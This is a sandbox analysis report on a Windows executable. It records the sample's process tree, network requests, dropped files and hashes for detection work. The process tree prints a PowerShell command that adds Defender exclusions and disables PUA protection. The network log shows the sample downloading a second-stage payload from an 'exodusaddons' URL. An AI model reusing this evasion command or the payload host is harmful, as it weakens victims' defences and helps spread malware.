Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    05/08/2023, 23:08 UTC

General

  • Target

    21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe

  • Size

    9.4MB

  • MD5

    718d69c7e8baa9b2fea5078ac9adf6b7

  • SHA1

    b409fa7ffde8cc8dbaff27ae6a51d3f599e0ed75

  • SHA256

    21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936

  • SHA512

    ece9d1dac93453594fee0df92f8ad9ffa14ba17d4589773eac2c6f5ae1759d4b22e1067813245d2d5ab613d2b7c45173e5aebd1e72c7a720082474b76d403515

  • SSDEEP

    196608:ZeduW/gMzIXjpjzoc1fln3yenGNSZO8WD5UW:jWou0jtzoc1tn3yenG4g8s5UW

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
    "C:\Users\Admin\AppData\Local\Temp\21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:Temp -ExclusionProcess *.exe -ExclusionExtension exe; Set-MpPreference -SubmitSamplesConsent NeverSend -PUAProtection Disabled
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2336
    • C:\Users\Admin\AppData\Local\Temp\fae64d7b-f774-411b-8dfc-51a5c6ba8440.exe
      "C:\Users\Admin\AppData\Local\Temp\fae64d7b-f774-411b-8dfc-51a5c6ba8440.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\SysWOW64\nslookup.exe
        nslookup dfslkdjfklhjsrhfgauiehruifghai
        3⤵
          PID:2284
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c cmd < 5
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2276
          • C:\Windows\SysWOW64\cmd.exe
            cmd
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:756
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell get-process avastui
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1044

    Network

    • flag-us
      DNS
      addons.smgsuite.com
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      8.8.8.8:53
      Request
      addons.smgsuite.com
      IN A
      Response
      addons.smgsuite.com
      IN A
      188.114.96.0
      addons.smgsuite.com
      IN A
      188.114.97.0
    • flag-us
      GET
      https://addons.smgsuite.com/exodus.txt
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      188.114.96.0:443
      Request
      GET /exodus.txt HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
      Host: addons.smgsuite.com
      Response
      HTTP/1.1 200 OK
      Date: Sat, 05 Aug 2023 23:08:45 GMT
      Content-Type: text/plain
      Content-Length: 220
      Connection: keep-alive
      Last-Modified: Wed, 29 Mar 2023 17:12:12 GMT
      ETag: "6424716c-dc"
      Accept-Ranges: bytes
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vSfLskKlSBhfQbGv%2FYiIf2A6LSYNl%2FrL23yLY1idgXURl%2FKRF31KM5SK6t5oEx7iUoe6ZvcGwqfGnQh6%2FzQxKYFy4W1IvvaCqQRx7MBI5d%2BiqCoTuOCYdT06lZK3fTVZ94ioEyXs"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 7f22b42fc84d1c08-AMS
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://addons.smgsuite.com/exodusaddons
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      188.114.96.0:443
      Request
      GET /exodusaddons HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
      Host: addons.smgsuite.com
      Cookie: 3f06b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjI3OVwiOjE2OTEyNzY5MzV9LFwiY2FtcGFpZ25zXCI6e1wiNjlcIjoxNjkxMjc2OTM1fSxcInRpbWVcIjoxNjkxMjc2OTM1fSJ9.jfWROQ-KJDou7tNFGE6bDw5tvpSSAojr1ceiNMB6SGI; _subid=2kti5kphsf5
      Response
      HTTP/1.1 200 OK
      Date: Sat, 05 Aug 2023 23:08:55 GMT
      Content-Type: application/octet-stream
      Content-Length: 1872384
      Connection: keep-alive
      Last-Modified: Mon, 30 Jan 2023 16:43:19 GMT
      ETag: "63d7f3a7-1c9200"
      Accept-Ranges: bytes
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uUZXNzyHrnhhJGVAJm7ouefrpzwCPqUL8PdREdWeVGTYY3BQKK7SrI99u7CEwCZLpuHKAmlT3zseL9anBFu130SC5%2BBle%2BLj%2F83ognZ%2FJX0CwfgbvpBoV65iSkgFTBTz3egRxX%2Bb"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 7f22b46cbd0e1c08-AMS
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      smgsuite.com
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      8.8.8.8:53
      Request
      smgsuite.com
      IN A
      Response
      smgsuite.com
      IN A
      188.114.97.0
      smgsuite.com
      IN A
      188.114.96.0
    • flag-us
      GET
      https://smgsuite.com/exodusaddons
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      188.114.97.0:443
      Request
      GET /exodusaddons HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
      Host: smgsuite.com
      Response
      HTTP/1.1 302 Found
      Date: Sat, 05 Aug 2023 23:08:55 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Cache-Control: no-cache, no-store, must-revalidate
      Expires: 0
      Location: https://addons.smgsuite.com/exodusaddons
      Pragma: no-cache
      Set-Cookie: _subid=2kti5kphsf5; expires=Tue, 05 Sep 2023 23:08:55 GMT; path=/
      Set-Cookie: 3f06b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjI3OVwiOjE2OTEyNzY5MzV9LFwiY2FtcGFpZ25zXCI6e1wiNjlcIjoxNjkxMjc2OTM1fSxcInRpbWVcIjoxNjkxMjc2OTM1fSJ9.jfWROQ-KJDou7tNFGE6bDw5tvpSSAojr1ceiNMB6SGI; expires=Wed, 10 Mar 2077 22:17:50 GMT; path=/
      Vary: Accept-Encoding
      Access-Control-Allow-Origin: *
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qyPUlYD6XFwnmGvHh1O9BkLI8Wa7FR6aWncpSomYMCotPQLdKe0MdKDFc05lHpRFZKPoOGDmVz7w8465lAv%2BMfgpVkxl3WJA%2FjBy%2B%2BahfShpzUfg6iRmEYqwbVbP2fQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 7f22b46c2dbb0a47-AMS
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      nslookup.exe
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      dfslkdjfklhjsrhfgauiehruifghai
      nslookup.exe
      Remote address:
      8.8.8.8:53
      Request
      dfslkdjfklhjsrhfgauiehruifghai
      IN A
      Response
    • flag-us
      DNS
      dfslkdjfklhjsrhfgauiehruifghai
      nslookup.exe
      Remote address:
      8.8.8.8:53
      Request
      dfslkdjfklhjsrhfgauiehruifghai
      IN AAAA
      Response
    • flag-us
      DNS
      github.com
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      140.82.114.4
    • 188.114.96.0:443
      https://addons.smgsuite.com/exodusaddons
      tls, http
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      46.2kB
      2.0MB
      937
      1681

      HTTP Request

      GET https://addons.smgsuite.com/exodus.txt

      HTTP Response

      200

      HTTP Request

      GET https://addons.smgsuite.com/exodusaddons

      HTTP Response

      200
    • 188.114.97.0:443
      https://smgsuite.com/exodusaddons
      tls, http
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      817 B
      6.3kB
      9
      9

      HTTP Request

      GET https://smgsuite.com/exodusaddons

      HTTP Response

      302
    • 140.82.114.4:443
      github.com
      tls
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      344 B
      179 B
      5
      4
    • 140.82.114.4:443
      github.com
      tls
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      288 B
      179 B
      5
      4
    • 8.8.8.8:53
      addons.smgsuite.com
      dns
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      65 B
      97 B
      1
      1

      DNS Request

      addons.smgsuite.com

      DNS Response

      188.114.96.0
      188.114.97.0

    • 8.8.8.8:53
      smgsuite.com
      dns
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      58 B
      90 B
      1
      1

      DNS Request

      smgsuite.com

      DNS Response

      188.114.97.0
      188.114.96.0

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      nslookup.exe
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      dfslkdjfklhjsrhfgauiehruifghai
      dns
      nslookup.exe
      76 B
      151 B
      1
      1

      DNS Request

      dfslkdjfklhjsrhfgauiehruifghai

    • 8.8.8.8:53
      dfslkdjfklhjsrhfgauiehruifghai
      dns
      nslookup.exe
      76 B
      151 B
      1
      1

      DNS Request

      dfslkdjfklhjsrhfgauiehruifghai

    • 8.8.8.8:53
      github.com
      dns
      21b3ec2a8f16bf7fb571925eda77f05c8c7a32fecd9c43cefba6223c47a80936.exe
      56 B
      72 B
      1
      1

      DNS Request

      github.com

      DNS Response

      140.82.114.4

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5

      Filesize

      12KB

      MD5

      05bb413f5ba120b0c746740c17c97fa2

      SHA1

      61716e2c9f375bfb9da6c36222890717eef4293e

      SHA256

      11cafc97516f7451af19bb5aa550003c28416580928b7f9abe430d743a1ed610

      SHA512

      133ca8be7349bac492476cc7cd9acbb6acde49cab191f07c6d7243e60ff0aac1ee81873d373075998765080068a149530ecc885610db25c6ba122f9e6e504518

    • C:\Users\Admin\AppData\Local\Temp\fae64d7b-f774-411b-8dfc-51a5c6ba8440.exe

      Filesize

      1.8MB

      MD5

      ac9cdaa7e93365384a7af4c7deb940ef

      SHA1

      4458ab569efb896eebad6a0c11fd2b4bd2ea3c2d

      SHA256

      30cb69aad54794a964298c87be266406a84f7ff77492db61c9f477f0dae09e28

      SHA512

      eb14329d29e0a6527af1b22ee01470ae54b28aabce64cc96e44ce3a7fde075c63bf117cbd356519d374ea000d0a150eb8ab888067c5d028e67ca31e83f3b8223

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ED7ZH1R2G4KRTXGBAIDU.temp

      Filesize

      7KB

      MD5

      5d143f649d512caafd62bb2529fd39f4

      SHA1

      c5eb0bdfb7c6019611727401d43da576763e24d6

      SHA256

      a368655b0207e85ab7f2efc875fca23b21f4e9eb805d098e9d74f99dd06f6ff8

      SHA512

      3042a5b24816ac7e4491ec108318402a268f91c1cb896304605947ce3839d7fbd573fd53bcda021d05d281975676c7a7d16db1d02b73fe56e146da29821eea86

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      5d143f649d512caafd62bb2529fd39f4

      SHA1

      c5eb0bdfb7c6019611727401d43da576763e24d6

      SHA256

      a368655b0207e85ab7f2efc875fca23b21f4e9eb805d098e9d74f99dd06f6ff8

      SHA512

      3042a5b24816ac7e4491ec108318402a268f91c1cb896304605947ce3839d7fbd573fd53bcda021d05d281975676c7a7d16db1d02b73fe56e146da29821eea86

    • \Users\Admin\AppData\Local\Temp\fae64d7b-f774-411b-8dfc-51a5c6ba8440.exe

      Filesize

      1.8MB

      MD5

      ac9cdaa7e93365384a7af4c7deb940ef

      SHA1

      4458ab569efb896eebad6a0c11fd2b4bd2ea3c2d

      SHA256

      30cb69aad54794a964298c87be266406a84f7ff77492db61c9f477f0dae09e28

      SHA512

      eb14329d29e0a6527af1b22ee01470ae54b28aabce64cc96e44ce3a7fde075c63bf117cbd356519d374ea000d0a150eb8ab888067c5d028e67ca31e83f3b8223

    • memory/1044-94-0x00000000734E0000-0x0000000073A8B000-memory.dmp

      Filesize

      5.7MB

    • memory/1044-98-0x00000000734E0000-0x0000000073A8B000-memory.dmp

      Filesize

      5.7MB

    • memory/1044-97-0x00000000026C0000-0x0000000002700000-memory.dmp

      Filesize

      256KB

    • memory/1044-96-0x00000000026C0000-0x0000000002700000-memory.dmp

      Filesize

      256KB

    • memory/1044-95-0x00000000734E0000-0x0000000073A8B000-memory.dmp

      Filesize

      5.7MB

    • memory/2096-54-0x0000000000830000-0x0000000001199000-memory.dmp

      Filesize

      9.4MB

    • memory/2096-62-0x0000000000830000-0x0000000001199000-memory.dmp

      Filesize

      9.4MB

    • memory/2096-113-0x0000000000830000-0x0000000001199000-memory.dmp

      Filesize

      9.4MB

    • memory/2336-60-0x00000000026B0000-0x00000000026F0000-memory.dmp

      Filesize

      256KB

    • memory/2336-61-0x0000000073A90000-0x000000007403B000-memory.dmp

      Filesize

      5.7MB

    • memory/2336-57-0x0000000073A90000-0x000000007403B000-memory.dmp

      Filesize

      5.7MB

    • memory/2336-59-0x00000000026B0000-0x00000000026F0000-memory.dmp

      Filesize

      256KB

    • memory/2336-58-0x0000000073A90000-0x000000007403B000-memory.dmp

      Filesize

      5.7MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.